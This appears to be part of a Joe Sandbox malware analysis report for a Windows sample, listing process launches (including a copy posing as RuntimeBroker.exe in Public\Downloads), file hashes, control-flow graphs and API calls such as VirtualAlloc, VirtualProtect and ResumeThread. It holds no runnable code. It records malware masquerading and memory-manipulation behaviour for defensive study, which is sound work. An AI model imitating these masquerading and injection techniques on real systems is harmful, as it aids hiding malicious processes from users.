                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:54
                                                                                                                                    Start time:13:42:45
                                                                                                                                    Start date:19/04/2024
                                                                                                                                    Path:C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:"C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe"
                                                                                                                                    Imagebase:0xe00000
                                                                                                                                    File size:2'079'744 bytes
                                                                                                                                    MD5 hash:9026338FCE277581062754CAB87462E7
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:55
                                                                                                                                    Start time:13:42:54
                                                                                                                                    Start date:19/04/2024
                                                                                                                                    Path:C:\Users\Public\Downloads\RuntimeBroker.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:"C:\Users\Public\Downloads\RuntimeBroker.exe"
                                                                                                                                    Imagebase:0xa50000
                                                                                                                                    File size:2'079'744 bytes
                                                                                                                                    MD5 hash:9026338FCE277581062754CAB87462E7
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:true


                                                                                                                                      Execution Graph

                                                                                                                                      Execution Coverage:5.1%
                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                      Signature Coverage:0%
                                                                                                                                      Total number of Nodes:9
                                                                                                                                      Total number of Limit Nodes:0
                                                                                                                                      execution_graph 14556 7ffd9bc52a4d 14557 7ffd9bc52a5f GetFileAttributesW 14556->14557 14559 7ffd9bc52b25 14557->14559 14564 7ffd9bc51779 14565 7ffd9bc51787 FindCloseChangeNotification 14564->14565 14567 7ffd9bc51864 14565->14567 14560 7ffd9bc5165c 14561 7ffd9bc5165f ResumeThread 14560->14561 14563 7ffd9bc51724 14561->14563

                                                                                                                                      Control-flow Graph

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1821717182.00007FFD9BC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC50000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc50000_W4tW72sfAD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: f40a86c21ca517f7367ef8408bb9cecc3a6a5ce5ff043324dceaf4ac9d4a076b
                                                                                                                                      • Instruction ID: a84b8ade305443e30f68071f8b6f95c0f690a232c2b2f2aaea4b81e229397a31
                                                                                                                                      • Opcode Fuzzy Hash: f40a86c21ca517f7367ef8408bb9cecc3a6a5ce5ff043324dceaf4ac9d4a076b
                                                                                                                                      • Instruction Fuzzy Hash: 41429330A1964A8FDB6DCFA8C4A4ABC77B1FF54301F5041BDD45ACB296DB38A981CB41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1782750162.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_W4tW72sfAD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 908605d3329978bedd785ee36c114ca1180c5dbc75e3ed3a51d253e06e013d84
                                                                                                                                      • Instruction ID: c8be6486eccbbabf4b95010a28abbb1fd46e1eb06e0a7d3fa6dad123eca9d192
                                                                                                                                      • Opcode Fuzzy Hash: 908605d3329978bedd785ee36c114ca1180c5dbc75e3ed3a51d253e06e013d84
                                                                                                                                      • Instruction Fuzzy Hash: C5A1BF71A19A4D8FEB98DF68C8647A9BFE1FFA9710F40017AE049D32EADB7418018741
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1821717182.00007FFD9BC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC50000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc50000_W4tW72sfAD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ChangeCloseFindNotification
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2591292051-0
                                                                                                                                      • Opcode ID: b1fc31bcee8ca690b411f8f111eeba0e10c8c72a5412d5d68ab867dbca95dfff
                                                                                                                                      • Instruction ID: 7bd776811b120d037b9e27a75bd6b50fec1cf36987301bb8a5c7ac4a4732f14f
                                                                                                                                      • Opcode Fuzzy Hash: b1fc31bcee8ca690b411f8f111eeba0e10c8c72a5412d5d68ab867dbca95dfff
                                                                                                                                      • Instruction Fuzzy Hash: EB414C70E0864C8FDB59DFA8D899BEDBBF0EF56310F1041AAD049D7292DA74A885CB41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 111 7ffd9bc52a4d-7ffd9bc52b23 GetFileAttributesW 115 7ffd9bc52b2b-7ffd9bc52b69 111->115 116 7ffd9bc52b25 111->116 116->115
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1821717182.00007FFD9BC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC50000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc50000_W4tW72sfAD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AttributesFile
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                      • Opcode ID: e65c7a5157dc184f2695a18de9cab87971b055ad8ff66c4b898f6f05e62a991d
                                                                                                                                      • Instruction ID: 132b99a0dd544fcd829e3eaa6cc30611e8184272948e2ce27ea5a5b2eac50cb0
                                                                                                                                      • Opcode Fuzzy Hash: e65c7a5157dc184f2695a18de9cab87971b055ad8ff66c4b898f6f05e62a991d
                                                                                                                                      • Instruction Fuzzy Hash: 7C410A70E0864C8FDB98DF98D895BEDBBF0FB5A310F10416ED049E7252DA719886CB41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 103 7ffd9bc5165c-7ffd9bc51722 ResumeThread 107 7ffd9bc51724 103->107 108 7ffd9bc5172a-7ffd9bc51774 103->108 107->108
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1821717182.00007FFD9BC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC50000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc50000_W4tW72sfAD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ResumeThread
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 947044025-0
                                                                                                                                      • Opcode ID: e07eb92ccde1c8dfefabc9b41233886b31240c17ab568f568196ef6c2d9ad8f6
                                                                                                                                      • Instruction ID: f08c30e06adf41d16c537313f9d2d7d8144b2e0cfe0ad8cce46266210f6f6cff
                                                                                                                                      • Opcode Fuzzy Hash: e07eb92ccde1c8dfefabc9b41233886b31240c17ab568f568196ef6c2d9ad8f6
                                                                                                                                      • Instruction Fuzzy Hash: 5841E974E08A1C8FDB98DFA8D899AEDBBF0FB59310F10416AD449E7251DA71A846CB40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 150 7ffd9b8906cd-7ffd9b8906ee 152 7ffd9b890708-7ffd9b8a0c65 150->152 153 7ffd9b8906f0-7ffd9b8a088f 150->153 158 7ffd9b8a0c67 152->158 159 7ffd9b8a0c6c-7ffd9b8a0c83 152->159 156 7ffd9b8a0896-7ffd9b8a089f call 7ffd9b890960 153->156 157 7ffd9b8a0891 153->157 161 7ffd9b8a08a4-7ffd9b8a08b1 156->161 157->156 158->159
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1782750162.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_W4tW72sfAD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: =N_^
                                                                                                                                      • API String ID: 0-3908133570
                                                                                                                                      • Opcode ID: 2bf21e089455a04f6de13e0fe4032bc67fd32884da049a587191901c341bc138
                                                                                                                                      • Instruction ID: c6ec6d807143af99403180534c359a242034746a7b73b4e1c8bf35619b3cbb14
                                                                                                                                      • Opcode Fuzzy Hash: 2bf21e089455a04f6de13e0fe4032bc67fd32884da049a587191901c341bc138
                                                                                                                                      • Instruction Fuzzy Hash: 87F05430A15A4D9FEF91EF98D8546FEBBE0FF58710F110576E41CD21A4DA34A6A0CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1782750162.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_W4tW72sfAD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: e989e6e5527cd9e4b1d7da4b57e3ff7f5857a1f0593f71c5d576a220e5fb754a
                                                                                                                                      • Instruction ID: 499c4bffffc92e94aed49405d97fae3ac7a504751cd14f13a14e55ccf81ab378
                                                                                                                                      • Opcode Fuzzy Hash: e989e6e5527cd9e4b1d7da4b57e3ff7f5857a1f0593f71c5d576a220e5fb754a
                                                                                                                                      • Instruction Fuzzy Hash: 4D51F462B0853ACAE71E77FCB9259ED6B80DF4432CB0842B7E05DCA0D7DD58648293D5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1782750162.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_W4tW72sfAD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: d3b463dd656f1c910e47943c4618cad02a3798ae84175e285bb5cd2bf6c3de8b
                                                                                                                                      • Instruction ID: 5b6776070c271b95d795d28c2bfa811eb992609a7e200e140a1603e60e635081
                                                                                                                                      • Opcode Fuzzy Hash: d3b463dd656f1c910e47943c4618cad02a3798ae84175e285bb5cd2bf6c3de8b
                                                                                                                                      • Instruction Fuzzy Hash: 5A51D671A1995D8FEFA0EB18C894AE9B7B1FB59341F4001EAA14DE3261DA746AC5CF00
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1782750162.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_W4tW72sfAD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 07fbee1c3d63d78115a5db4ddb5bda7bd54d789bf29145f7abb399fa03b5b8c4
                                                                                                                                      • Instruction ID: e4f9f4774999c202ee0df8f41a41f5f7704890899b32dc08f3200836d710f7e4
                                                                                                                                      • Opcode Fuzzy Hash: 07fbee1c3d63d78115a5db4ddb5bda7bd54d789bf29145f7abb399fa03b5b8c4
                                                                                                                                      • Instruction Fuzzy Hash: 4F517A34A0490E9FCF94EF98D894EEDBBF1FF58315B050169E419E7260DA34E990CB90
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1782750162.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_W4tW72sfAD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: fa5ca149398a54ba528d666e65ec9f84cc7fada8b73f768fb17daacc5f821083
                                                                                                                                      • Instruction ID: 28cc4f9d8e495b7f60956cdbb5ce5e8c4c1476176ee8149459e486c027fe42ac
                                                                                                                                      • Opcode Fuzzy Hash: fa5ca149398a54ba528d666e65ec9f84cc7fada8b73f768fb17daacc5f821083
                                                                                                                                      • Instruction Fuzzy Hash: F2410670A18A5D8FDF98EF98C895AEDBBF1FF58305F10017AE41DE3295DA34A8418B41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1782750162.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_W4tW72sfAD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: a6664421b6a48d8d84025898304878ffcb0d47582e1ad8af7b763e81078861ed
                                                                                                                                      • Instruction ID: 214dccc7266388b8657290419d759afd2bc0c73a56af4698552b24b78792b689
                                                                                                                                      • Opcode Fuzzy Hash: a6664421b6a48d8d84025898304878ffcb0d47582e1ad8af7b763e81078861ed
                                                                                                                                      • Instruction Fuzzy Hash: B5319BB1A0991D8FDFA8DF14C855AE9B7B1FB68305F1041EE810EE32A4CB759A81CF45
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1782750162.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b890000_W4tW72sfAD.jbxd
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1785986261.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9ba00000_W4tW72sfAD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: $!$"$#$$$%$&$'$($)$*$+$,$-$.$/$0$1$2$3$4$5$6$7$8$9$:$;$<$=$>$?$@$A$B$BsQ$BsQ$BsQ$BsQ$BsQ$BsQ$BsQ$C$D$D$E$F$G$H$I$J$K$L$M$N$O$P$Q$R$S$T$U$V$W$X$Y$Z$[$\$]$^$_$`$a$b$c$d$e$e$f$g$h$i$j$k$kwgM$kwgM$kwgM$kwgM$l$m$n$o$p$q$r$s$s_W$s_W$s_W$t$u$v$w$x$y$z${$|$}$~$xK$xK
                                                                                                                                      • API String ID: 0-1833979755
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Execution Graph

                                                                                                                                      Execution Coverage:4.8%
                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                      Signature Coverage:0%
                                                                                                                                      Total number of Nodes:7
                                                                                                                                      Total number of Limit Nodes:0
                                                                                                                                      execution_graph 16065 7ffd9b8903fe 16066 7ffd9b89040d VirtualProtect 16065->16066 16068 7ffd9b89054d 16066->16068 16061 7ffd9b891ae1 16062 7ffd9b891aff 16061->16062 16063 7ffd9b891efd VirtualAlloc 16062->16063 16064 7ffd9b891f55 16063->16064

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B899000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B899000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b899000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 2$H$zM_H
                                                                                                                                      • API String ID: 0-2006335857
                                                                                                                                      • Opcode ID: 9c3f8117c0ce193a85995367ee3fa3e5d59da48ed6e019a803ff87b08c834420
                                                                                                                                      • Instruction ID: 19454bbd17550fad09603b8e01848d1e4e3652dc24b868b504a1118b492a37ce
                                                                                                                                      • Opcode Fuzzy Hash: 9c3f8117c0ce193a85995367ee3fa3e5d59da48ed6e019a803ff87b08c834420
                                                                                                                                      • Instruction Fuzzy Hash: 7AC2D774E1992D8FDBA8DB58C8A4BA9B7B1FF58300F5041E9D01DE72A5DB346A81CF40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b8c3000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: Em>N
                                                                                                                                      • API String ID: 0-488659082
                                                                                                                                      • Opcode ID: 4a27930f80629b0f48b23d86148c851c204864b7fa99f2e4b6ad1b596a5f9019
                                                                                                                                      • Instruction ID: 957804dee4bf3e7f8fe51c468918f40635e5df310176ab71a5894cbb23b3cf71
                                                                                                                                      • Opcode Fuzzy Hash: 4a27930f80629b0f48b23d86148c851c204864b7fa99f2e4b6ad1b596a5f9019
                                                                                                                                      • Instruction Fuzzy Hash: 86222670E0421D8FDB58DFA8C895AEDBBB2FF48300F14866AD419EB255DB34A981CF50
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b880000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: cf98d424b2a7961e62a6b06f18bbaff97ef30c2978d49a5544e2156922ee6295
                                                                                                                                      • Instruction ID: cee18fc3cc3ffe8c6400c3666b464a1db33aa200e3b1dfd72a9eba486a9e5de4
                                                                                                                                      • Opcode Fuzzy Hash: cf98d424b2a7961e62a6b06f18bbaff97ef30c2978d49a5544e2156922ee6295
                                                                                                                                      • Instruction Fuzzy Hash: 2AA1E370A19A4D8FE798DB6CC8657A97BF1FFAA710F4001BAD05DD72E6CB7818018741
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 278 7ffd9b891ae1-7ffd9b891b15 280 7ffd9b891b17 278->280 281 7ffd9b891b1c-7ffd9b891b6b 278->281 280->281 284 7ffd9b891b6d 281->284 285 7ffd9b891b72-7ffd9b891bbb 281->285 284->285 288 7ffd9b891bbd 285->288 289 7ffd9b891bc2-7ffd9b891c15 285->289 288->289 292 7ffd9b891c17 289->292 293 7ffd9b891c1c-7ffd9b891c69 289->293 292->293 296 7ffd9b891c6b 293->296 297 7ffd9b891c70-7ffd9b891cc0 293->297 296->297 300 7ffd9b891cc7-7ffd9b891d38 297->300 301 7ffd9b891cc2 297->301 304 7ffd9b891d3a 300->304 305 7ffd9b891d3f-7ffd9b891d48 300->305 301->300 304->305 306 7ffd9b891dda-7ffd9b891f53 VirtualAlloc 305->306 307 7ffd9b891d4e-7ffd9b891dae call 7ffd9b88fe40 305->307 317 7ffd9b891f55 306->317 318 7ffd9b891f5b-7ffd9b891fbf 306->318 323 7ffd9b891db6-7ffd9b891dd3 307->323 317->318 323->306
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B88F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B88F000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b88f000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                      • Opcode ID: f14942afa5df6d615368d6cd00dbcc9f3a42a680ff8c544675e9a0f3e7c5354c
                                                                                                                                      • Instruction ID: 556c3dd6e9f5f7e37848db4c1729fb5357ba799d402fcfecfa15124ed11d396f
                                                                                                                                      • Opcode Fuzzy Hash: f14942afa5df6d615368d6cd00dbcc9f3a42a680ff8c544675e9a0f3e7c5354c
                                                                                                                                      • Instruction Fuzzy Hash: F3029F3090DA8D8FDF95EF68C855AE97BF1FF59300F0141AAE448D72A2DB34A985CB41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 390 7ffd9b8903fe-7ffd9b89040b 391 7ffd9b890416-7ffd9b890427 390->391 392 7ffd9b89040d-7ffd9b890415 390->392 393 7ffd9b890429-7ffd9b890431 391->393 394 7ffd9b890432-7ffd9b89054b VirtualProtect 391->394 392->391 393->394 399 7ffd9b89054d 394->399 400 7ffd9b890553-7ffd9b8905a3 394->400 399->400
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B88F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B88F000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b88f000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 544645111-0
                                                                                                                                      • Opcode ID: 9b83865c25587fa3ca2f9dab4e3e08f9581a2cfdc5c32e1181a0cbf12bf8a22f
                                                                                                                                      • Instruction ID: 605fa173f2b3929a505135a45bcb3001d5fad243aa1ee5d40a56158ae7331512
                                                                                                                                      • Opcode Fuzzy Hash: 9b83865c25587fa3ca2f9dab4e3e08f9581a2cfdc5c32e1181a0cbf12bf8a22f
                                                                                                                                      • Instruction Fuzzy Hash: 21517E70D0864D8FDF54DFA8C845AEDBBF0FB6A310F1042AAD449E3256DB74A885CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 403 7ffd9b894a02-7ffd9b894a35 405 7ffd9b894a3f-7ffd9b894a78 403->405 407 7ffd9b894a86-7ffd9b894a8d 405->407 408 7ffd9b894a7a-7ffd9b894a84 405->408 409 7ffd9b894aad-7ffd9b894f8c 407->409 410 7ffd9b894a8f-7ffd9b894c74 407->410 408->407 409->407 417 7ffd9b894f92-7ffd9b894f9c 409->417 410->407 415 7ffd9b894c7a-7ffd9b894c84 410->415 415->407 417->407
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B894000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B894000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b894000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: +
                                                                                                                                      • API String ID: 0-2126386893
                                                                                                                                      • Opcode ID: eddafa6d9939922604de03f4b42bac5449ee708ba016fa87cdb1dab642ab38f9
                                                                                                                                      • Instruction ID: 4e0f4fe64aea6ad4236fe90158fee17b74f40b1303a9f276293543852cdea031
                                                                                                                                      • Opcode Fuzzy Hash: eddafa6d9939922604de03f4b42bac5449ee708ba016fa87cdb1dab642ab38f9
                                                                                                                                      • Instruction Fuzzy Hash: E0310370A1962D8FEBB8DB54C8A47A9B7F1FF49300F1041E9D04DA2291DB786BC48F41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B899000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B899000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b899000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 17d7f82fcbb78064091032633a7860ca131df807bb98c53f8292256aad79c7a5
                                                                                                                                      • Instruction ID: 0f26ee7f938ff6f686900569bd0342a0027df4f70ddfdd4048cda32136d163fc
                                                                                                                                      • Opcode Fuzzy Hash: 17d7f82fcbb78064091032633a7860ca131df807bb98c53f8292256aad79c7a5
                                                                                                                                      • Instruction Fuzzy Hash: 5342BC70A0991D8FDFA8DF58C895AA9B7B2FF98301F1141E9D00DD72A5DA35AE81CF40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b8c3000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 119e34bc25bbe677624d79eefbcfb88dc1046b867057a1c2945ac4154d4572ba
                                                                                                                                      • Instruction ID: 88611a6c14a18fce6b6c5543a0fc41ea59210c147374c3482326d47b819cf9e6
                                                                                                                                      • Opcode Fuzzy Hash: 119e34bc25bbe677624d79eefbcfb88dc1046b867057a1c2945ac4154d4572ba
                                                                                                                                      • Instruction Fuzzy Hash: 09D15DB1E1964D8FEB58EB58C8A5BF8B7B1FF58300F4401BAD00D972E2DA346981CB41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000013.00000002.2774199488.00007FFD9B899000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B899000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_19_2_7ffd9b899000_juptXkyeRvGsIZrQGeVEsrnWhD.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 712f4ff231cf1df9e3353ec8876cb348f64bf0921d497ba7a92ba37420fbe0c9
                                                                                                                                      • Instruction ID: 0f03dc5ca7ddf64193a62619943fd647b0fc73206490cd23eeba081a8e90858a
